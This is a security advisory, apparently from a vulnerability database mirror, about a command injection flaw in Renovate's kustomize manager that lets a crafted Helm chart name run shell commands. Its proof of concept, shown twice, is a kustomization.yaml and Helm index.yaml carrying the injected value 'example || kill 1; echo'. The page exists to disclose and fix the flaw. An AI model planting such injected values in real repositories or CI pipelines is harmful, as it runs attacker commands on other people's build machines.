GHSA-XV56-3WQ5-9997
Vulnerability from github – Published: 2026-01-13 19:57 – Updated: 2026-01-13 19:57
VLAI?
Summary
Renovate vulnerable to arbitrary command injection via kustomize manager and malicious helm repository
Details
Summary
The user-provided chart name in the kustomize manager is appended to the helm pull --untar command without proper sanitization.
Details
Adversaries can provide a maliciously crafted kustomization.yaml in conjunction with a Helm repo's index.yaml file to trick Renovate to execute arbitrary code.
The value for the depName argument for the helmRepositoryArgs function in lib/modules/manager/kustomize/artifacts.ts is not being escaped using the quote function from the shlex package.
This lack of proper sanitization has been present in the product since version 39.218.9 (https://github.com/renovatebot/renovate/commit/cc08c6e98f19e6258c5d3180c70c98e1be0b0d37), released on March 26 of 2025.
PoC
- Create a mock Helm repository. Have its
index.yamlendpoint return:
apiVersion: v1
entries:
"example || kill 1; echo":
- version: 1.0.1
created: 2016-10-06T16:23:20.499814565-06:00
- version: 1.0.0
created: 2016-10-06T16:23:20.499543808-06:00
- Create a git repo with the following content:
renovate.json5:
{
$schema: "https://docs.renovatebot.com/renovate-schema.json",
postUpdateOptions: [
"kustomizeInflateHelmCharts",
]
}
kustomization.yaml:
kind: Kustomization
apiVersion: kustomize.config.k8s.io/v1beta1
helmCharts:
- name: "example || kill 1; echo"
repo: TODO reference the mocked Helm repository over https
version: 1.0.0
with the todo resolved
charts/.gitkeep:
(empty)
- Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting "Repository finished", because the ACI vulnerability allowed for execution of
kill 1, terminating the root process of the container.
Impact
This is a Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.
Severity ?
6.7 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "renovate"
},
"ranges": [
{
"events": [
{
"introduced": "39.218.0"
},
{
"fixed": "40.33.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-77"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-13T19:57:06Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\nThe user-provided chart name in the `kustomize` manager is appended to the `helm pull --untar` command without proper sanitization.\n\n### Details\nAdversaries can provide a maliciously crafted `kustomization.yaml` in conjunction with a Helm repo\u0027s `index.yaml` file to trick Renovate to execute arbitrary code.\nThe value for the `depName` argument for the `helmRepositoryArgs` function in [lib/modules/manager/kustomize/artifacts.ts](https://github.com/renovatebot/renovate/blob/cc08c6e98f19e6258c5d3180c70c98e1be0b0d37/lib/modules/manager/kustomize/artifacts.ts#L33) is not being escaped using the `quote` function from the `shlex` package.\nThis lack of proper sanitization has been present in the product since version 39.218.9 (https://github.com/renovatebot/renovate/commit/cc08c6e98f19e6258c5d3180c70c98e1be0b0d37), released on March 26 of 2025.\n\n### PoC\n1. Create a mock Helm repository. Have its `index.yaml` endpoint return:\n```yaml\napiVersion: v1\nentries:\n \"example || kill 1; echo\":\n - version: 1.0.1\n created: 2016-10-06T16:23:20.499814565-06:00\n - version: 1.0.0\n created: 2016-10-06T16:23:20.499543808-06:00\n```\n\n2. Create a git repo with the following content:\n\n`renovate.json5`:\n\n```json5\n{\n $schema: \"https://docs.renovatebot.com/renovate-schema.json\",\n postUpdateOptions: [\n \"kustomizeInflateHelmCharts\",\n ]\n}\n```\n\n`kustomization.yaml`:\n\n```yaml\nkind: Kustomization\napiVersion: kustomize.config.k8s.io/v1beta1\nhelmCharts:\n - name: \"example || kill 1; echo\"\n repo: TODO reference the mocked Helm repository over https\n version: 1.0.0\n```\nwith the todo resolved\n\n`charts/.gitkeep`:\n\n(empty)\n\n3. Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting \"Repository finished\", because the ACI vulnerability allowed for execution of `kill 1`, terminating the root process of the container.\n\n### Impact\nThis is a Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.",
"id": "GHSA-xv56-3wq5-9997",
"modified": "2026-01-13T19:57:06Z",
"published": "2026-01-13T19:57:06Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/renovatebot/renovate/security/advisories/GHSA-xv56-3wq5-9997"
},
{
"type": "PACKAGE",
"url": "https://github.com/renovatebot/renovate"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Renovate vulnerable to arbitrary command injection via kustomize manager and malicious helm repository"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…